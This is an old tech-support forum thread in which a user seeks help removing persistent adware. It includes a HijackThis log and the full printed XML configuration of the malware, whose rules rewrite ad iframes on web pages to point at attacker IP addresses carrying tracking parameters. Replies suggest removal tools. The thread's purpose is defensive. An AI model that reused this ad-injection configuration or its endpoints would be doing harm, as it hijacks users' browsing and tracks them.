Help me remove persistent malware

Hi

I have a problem with a PC in that some malware seems to get half removed by McAfee, which leaves the web pages incompletely loaded. Ok, I have solved that by using Opera BUT, I cannot get rid of this pest. I use McAfee, Spy Hunterm Uniblue Spy Eraser and RogueRemover pro-nothing will shift this.

It starts with an XML page that regenerates itself when removed.(see end of this question for the content). This appears in the HKLM Run section, to run Rundll32.exe (from the system32 directory via prefetching commands) This in turn runs a dll, which is in the system32 directory. This malware even logs on as another user (I have since changed the log on to a guest and with password control to try and prevent this).

Hre is the HijackThis log:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 22:26:24, on 27-01-2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16574)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Programmer\Fælles filer\McAfee\HackerWatch\HWAPI.exe
C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
c:\programmer\fælles filer\mcafee\mna\mcnasvc.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcods.exe
C:\PROGRA~1\McAfee\MSC\mcpromgr.exe
c:\PROGRA~1\FÆLLES~1\mcafee\mcproxy\mcproxy.exe
c:\PROGRA~1\FÆLLES~1\mcafee\redirsvc\redirsvc.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe
C:\Programmer\McAfee\MPF\MPFSrv.exe
C:\PROGRA~1\McAfee\MPS\mps.exe
C:\Programmer\McAfee\MSK\MskSrver.exe
C:\WINDOWS\system32\HPZipm12.exe
C:\Programmer\SiteAdvisor\6253\SAService.exe
C:\WINDOWS\system32\svchost.exe
C:\Programmer\McAfee\MSK\MskAgent.exe
C:\Programmer\SiteAdvisor\6253\SiteAdv.exe
C:\WINDOWS\StartupMonitor.exe
C:\Programmer\Enigma Software Group\SpyHunter\SpyHunter3.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Programmer\HP\Digital Imaging\bin\hpqtra08.exe
C:\Programmer\McAfee\MPS\mpsevh.exe
C:\Programmer\HP\Digital Imaging\bin\hpqimzone.exe
c:\PROGRA~1\mcafee.com\agent\mcagent.exe
C:\WINDOWS\System32\alg.exe
C:\Programmer\HP\Digital Imaging\bin\hpqSTE08.exe
C:\Programmer\HP\Digital Imaging\Product Assistant\bin\hprblog.exe
C:\Documents and Settings\Anne\Skrivebord\Startup.exe
C:\WINDOWS\system32\HPZinw12.exe
C:\WINDOWS\regedit.exe
C:\Documents and Settings\Anne\Skrivebord\HiJackThis.exe
C:\PROGRAM FILES\PROCESS EXPLORER\PROCEXP.EXE
C:\WINDOWS\explorer.exe
C:\Programmer\Opera\Opera.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://dellsearchedit.myway.com/samisc/dellsidebar.jhtml?p=DJ
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.epilepsiforeningen.dk/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Hyperlinks
O3 - Toolbar: McAfee SiteAdvisor - {0BF43445-2F28-4351-9252-17FE6E806AA0} - C:\Programmer\SiteAdvisor\6253\SiteAdv.dll
O4 - HKLM\..\Run: [DLA] C:\WINDOWS\System32\DLA\DLACTRLW.EXE
O4 - HKLM\..\Run: [MskAgentexe] C:\Programmer\McAfee\MSK\MskAgent.exe
O4 - HKLM\..\Run: [SiteAdvisor] C:\Programmer\SiteAdvisor\6253\SiteAdv.exe
O4 - HKLM\..\Run: [Run StartupMonitor] StartupMonitor.exe
O4 - HKLM\..\Run: [Spyhunter Security Suite] "C:\Programmer\Enigma Software Group\SpyHunter\SpyHunter3.exe" -minimized
O4 - HKLM\..\Run: [BM870dc8a8] Rundll32.exe "C:\WINDOWS\system32\sslnpilc.dll",s
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'LOKAL TJENESTE')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'NETVÆRKSTJENESTE')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Programmer\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: HP Digital Imaging Monitor.lnk = C:\Programmer\HP\Digital Imaging\bin\hpqtra08.exe
O4 - Global Startup: HP Image Zone Hurtig start.lnk = C:\Programmer\HP\Digital Imaging\bin\hpqthb08.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Programmer\Microsoft Office\Office10\OSA.EXE
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~3\Office10\EXCEL.EXE/3000
O8 - Extra context menu item: Send til &Bluetooth-enhed... - C:\Programmer\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
O9 - Extra button: FirstClass® - {02011FE3-C22B-451d-9A25-BF4DBB38B8E7} - C:\WINDOWS\Downloaded Program Files\fcplugin.dll
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programmer\Java\jre1.6.0_03\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programmer\Java\jre1.6.0_03\bin\ssv.dll
O9 - Extra button: @btrez.dll,-4015 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Programmer\WIDCOMM\Bluetooth Software\btsendto_ie.htm
O9 - Extra 'Tools' menuitem: @btrez.dll,-12650 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Programmer\WIDCOMM\Bluetooth Software\btsendto_ie.htm
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programmer\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programmer\Messenger\msmsgs.exe
O16 - DPF: {11818680-FCF6-11D0-9808-0800092A4865} (Adobe Form Control) - http://www.kps.dk/Codebase/FormCtl.cab
O16 - DPF: {1469FF24-47F6-11D2-8805-006008C537E3} (Adobe Mail Control) - http://www.kps.dk/codebase/ffmail.cab
O16 - DPF: {4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} (McAfee.com Operating System Class) - http://download.mcafee.com/molbin/shared/mcinsctl/4,0,0,101/mcinsctl.cab
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://www.update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1201280089546
O16 - DPF: {9C196458-4145-46AF-8A77-1506878DFECA} (FirstClass® Control) - ftp://ftp.sektornet.dk/sektornet/skolekom/fcplugin.cab
O16 - DPF: {CDDCFBB3-4D93-11D2-B1A9-00A0C9B742BE} (Adobe Script Object) - http://www.kps.dk/codebase/scriptobject.cab
O16 - DPF: {D8575CE3-3432-4540-88A9-85A1325D3375} (e-Safekey) - https://netbank.danskebank.dk/html/activex/e-Safekey/DB/e-Safekey.cab
O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Programmer\WIDCOMM\Bluetooth Software\bin\btwdins.exe
O23 - Service: McAfee E-mail Proxy (Emproxy) - McAfee, Inc. - C:\PROGRA~1\FÆLLES~1\McAfee\EmProxy\emproxy.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Programmer\Fælles filer\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Computer, Inc. - C:\Programmer\iPod\bin\iPodService.exe
O23 - Service: McAfee HackerWatch Service - McAfee, Inc. - C:\Programmer\Fælles filer\McAfee\HackerWatch\HWAPI.exe
O23 - Service: McAfee Update Manager (mcmispupdmgr) - McAfee, Inc. - C:\PROGRA~1\McAfee\MSC\mcupdmgr.exe
O23 - Service: McAfee Services (mcmscsvc) - McAfee, Inc. - C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
O23 - Service: McAfee Network Agent (McNASvc) - McAfee, Inc. - c:\programmer\fælles filer\mcafee\mna\mcnasvc.exe
O23 - Service: McAfee Scanner (McODS) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcods.exe
O23 - Service: McAfee Protection Manager (mcpromgr) - McAfee, Inc. - C:\PROGRA~1\McAfee\MSC\mcpromgr.exe
O23 - Service: McAfee Proxy Service (McProxy) - McAfee, Inc. - c:\PROGRA~1\FÆLLES~1\mcafee\mcproxy\mcproxy.exe
O23 - Service: McAfee Redirector Service (McRedirector) - McAfee, Inc. - c:\PROGRA~1\FÆLLES~1\mcafee\redirsvc\redirsvc.exe
O23 - Service: McAfee Real-time Scanner (McShield) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
O23 - Service: McAfee SystemGuards (McSysmon) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe
O23 - Service: McAfee Personal Firewall Service (MpfService) - McAfee, Inc. - C:\Programmer\McAfee\MPF\MPFSrv.exe
O23 - Service: McAfee Privacy Service (MPS9) - McAfee, Inc. - C:\PROGRA~1\McAfee\MPS\mps.exe
O23 - Service: McAfee SpamKiller Service (MSK80Service) - McAfee Inc. - C:\Programmer\McAfee\MSK\MskSrver.exe
O23 - Service: Intel NCS NetService (NetSvc) - Intel(R) Corporation - C:\Programmer\Intel\PROSetWired\NCS\Sync\NetSvc.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: SiteAdvisor-tjeneste (SiteAdvisor Service) - Unknown owner - C:\Programmer\SiteAdvisor\6253\SAService.exe

--
End of file - 8833 bytes


(See the HKLM entry for BM870dc8a8)

BM870dc8a8 is this:

<ROOT><CAMPAIGNLIST><CAMPAIGN name="120x240" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?240['"]?))+[^>]*?((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?240['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=120x240;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='ae4390b5' name='ae4390b5' src='http://85.17.166.173/go/?cmp=nm_bm3s_120x240&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='120' height='240'><a href='http://85.12.43.83/www/delivery/ck.php?n=ad03d9ca' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=35&n=ad03d9ca' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="120x600" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?600['"]?))+[^>]*?((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?600['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=120x600;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a57232fb' name='a57232fb' src='http://85.17.166.173/go/?cmp=nm_bm3s_120x600&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='120' height='600'><a href='http://85.12.43.83/www/delivery/ck.php?n=a2d7629e' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=36&n=a2d7629e' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="120x90" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?90['"]?))+[^>]*?((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?90['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=120x90;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a8c6b7cd' name='a8c6b7cd' src='http://85.17.166.173/go/?cmp=nm_bm3s_120x90&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='120' height='90'><a href='http://85.12.43.83/www/delivery/ck.php?n=a0118327' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=37&n=a0118327' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="125x125" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?125['"]?)|(HEIGHT=['"]?125['"]?))+[^>]*?((WIDTH=['"]?125['"]?)|(HEIGHT=['"]?125['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=125x125;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a6ea2661' name='a6ea2661' src='http://85.17.166.173/go/?cmp=nm_bm3s_125x125&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='125' height='125'><a href='http://85.12.43.83/www/delivery/ck.php?n=afe4b666' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=38&n=afe4b666' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="160x600" id="20080124"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?160['"]?)|(HEIGHT=['"]?600['"]?))+[^>]*?((WIDTH=['"]?160['"]?)|(HEIGHT=['"]?600['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=160x600;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a8a9405d' name='a8a9405d' src='http://85.17.166.173/go/?cmp=nm_bm3s_160x600&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='160' height='600'></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="180x150" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?180['"]?)|(HEIGHT=['"]?150['"]?))+[^>]*?((WIDTH=['"]?180['"]?)|(HEIGHT=['"]?150['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=180x150;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='aa44b86f' name='aa44b86f' src='http://85.17.166.173/go/?cmp=nm_bm3s_180x150&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='180' height='150'><a href='http://85.12.43.83/www/delivery/ck.php?n=a935a5aa' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=39&n=a935a5aa' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="234x60" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?234['"]?)|(HEIGHT=['"]?60['"]?))+[^>]*?((WIDTH=['"]?234['"]?)|(HEIGHT=['"]?60['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=234x60;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a80f0628' name='a80f0628' src='http://85.17.166.173/go/?cmp=nm_bm3s_234x60&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='234' height='60'><a href='http://85.12.43.83/www/delivery/ck.php?n=a61ab872' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=40&n=a61ab872' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="240x400" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?240['"]?)|(HEIGHT=['"]?400['"]?))+[^>]*?((WIDTH=['"]?240['"]?)|(HEIGHT=['"]?400['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=240x400;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a4da5d34' name='a4da5d34' src='http://85.17.166.173/go/?cmp=nm_bm3s_240x400&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='240' height='400'><a href='http://85.12.43.83/www/delivery/ck.php?n=a424da19' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=41&n=a424da19' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="250x250" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?250['"]?)|(HEIGHT=['"]?250['"]?))+[^>]*?((WIDTH=['"]?250['"]?)|(HEIGHT=['"]?250['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=250x250;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='ad90e55d' name='ad90e55d' src='http://85.17.166.173/go/?cmp=nm_bm3s_250x250&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='250' height='250'><a href='http://85.12.43.83/www/delivery/ck.php?n=ac032ecf' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=42&n=ac032ecf' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="300x100" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?300['"]?)|(HEIGHT=['"]?100['"]?))+[^>]*?((WIDTH=['"]?300['"]?)|(HEIGHT=['"]?100['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=300x100;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a1111aad' name='a1111aad' src='http://85.17.166.173/go/?cmp=nm_bm3s_300x100&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='300' height='100'><a href='http://85.12.43.83/www/delivery/ck.php?n=a8b2301d' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=43&n=a8b2301d' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="300x250" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?300['"]?)|(HEIGHT=['"]?250['"]?))+[^>]*?((WIDTH=['"]?300['"]?)|(HEIGHT=['"]?250['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=300x250;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a7b91358' name='a7b91358' src='http://85.17.166.173/go/?cmp=nm_bm3s_300x250&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='300' height='250'><a href='http://85.12.43.83/www/delivery/ck.php?n=aa619a73' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=44&n=aa619a73' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="336x280" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?336['"]?)|(HEIGHT=['"]?280['"]?))+[^>]*?((WIDTH=['"]?336['"]?)|(HEIGHT=['"]?280['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=336x280;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a1e38bd4' name='a1e38bd4' src='http://85.17.166.173/go/?cmp=nm_bm3s_336x280&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='336' height='280'><a href='http://85.12.43.83/www/delivery/ck.php?n=aa2664b8' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=45&n=aa2664b8' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="468x60" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?468['"]?)|(HEIGHT=['"]?60['"]?))+[^>]*?((WIDTH=['"]?468['"]?)|(HEIGHT=['"]?60['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=468x60;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a24b320b' name='a24b320b' src='http://85.17.166.173/go/?cmp=nm_bm3s_468x60&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='468' height='60'><a href='http://85.12.43.83/www/delivery/ck.php?n=aa173903' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=46&n=aa173903' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="720x300" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?720['"]?)|(HEIGHT=['"]?300['"]?))+[^>]*?((WIDTH=['"]?720['"]?)|(HEIGHT=['"]?300['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=720x300;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='aaf81f87' name='aaf81f87' src='http://85.17.166.173/go/?cmp=nm_bm3s_720x300&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='720' height='300'><a href='http://85.12.43.83/www/delivery/ck.php?n=afb3d0f9' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=47&n=afb3d0f9' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="728x90" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?728['"]?)|(HEIGHT=['"]?90['"]?))+[^>]*?((WIDTH=['"]?728['"]?)|(HEIGHT=['"]?90['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=728x90;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='aff78e03' name='aff78e03' src='http://85.17.166.173/go/?cmp=nm_bm3s_728x90&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='728' height='90'><a href='http://85.12.43.83/www/delivery/ck.php?n=a8ac5ed4' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=48&n=a8ac5ed4' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN></CAMPAIGNLIST><COOKIES><COOKIE>ip=ODcuNjAuOTYuOTA#</COOKIE><COOKIE>country=REs#</COOKIE><COOKIE>network=Ym0#</COOKIE></COOKIES></ROOT>

Has anyone got ANY idea how to remove the mechanism that regenerates this pest? The IP address resolves to Breda in Holland.
steve0412Asked:
Who is Participating?
 
IndiGenusConnect With a Mentor Commented:
Certainly looks like Vundo/Conhook Trojan to me...

Download and Run ComboFix (by sUBs)

http://download.bleepingcomputer.com/sUBs/ComboFix.exe

Disable your Anti-virus and any real-time Anti-spyware monitors that are running.
Then double click Combofix.exe & follow the prompts.
When finished, it will produce a log for you. Upload that log in your next reply with a new HijackThis log.  

Please do not post the log into the comment window. Use "Attach File" under the comment window to post the log.

Note 1: Do not mouseclick combofix's window while it's running. That may cause it to stall.
Note 2: Remember to re-enable your Anti-virus and Anti-spyware.

NOTE: If you have issues connecting to your network or internet after running combofix you can either simply reboot, or do the following:
* Going to Control Panel > Network Connections.
* Right click on their Network icons & select "Repair"
or
Alternately, if the Network icon appears in the notification area in the lower right corner of Desktop, right-click it, and then click Repair from the shortcut menu.

PLEASE ALSO NOTE: Combofix will typically fix most and sometimes all Malware entries but many times a script is also needed to finish cleaning up. So please keep CF until advised whether you need the script or not.
0
 
rhythmluvrCommented:
Avast AntiVirus Home Edition (Free) has a great feature, during the install it will ask whether you would like to perform a pre-boot scan of your system. During the next reboot it will scan your system before it fully loads the operating system, I have used this to get rid of stubborn malware that other programs will not remove. I have installed this program with other AntiVirus on the system already, it will warn you that it found another AV program but once the pre-scan has been performed you can remove it.

It is the only software I have seen with this feature.
0
 
chilternPCCommented:
one you have clear this problem ( I use spybot myself from here :
http://www.safer-networking.org/en/index.html ) and the free windows defender from microsnot

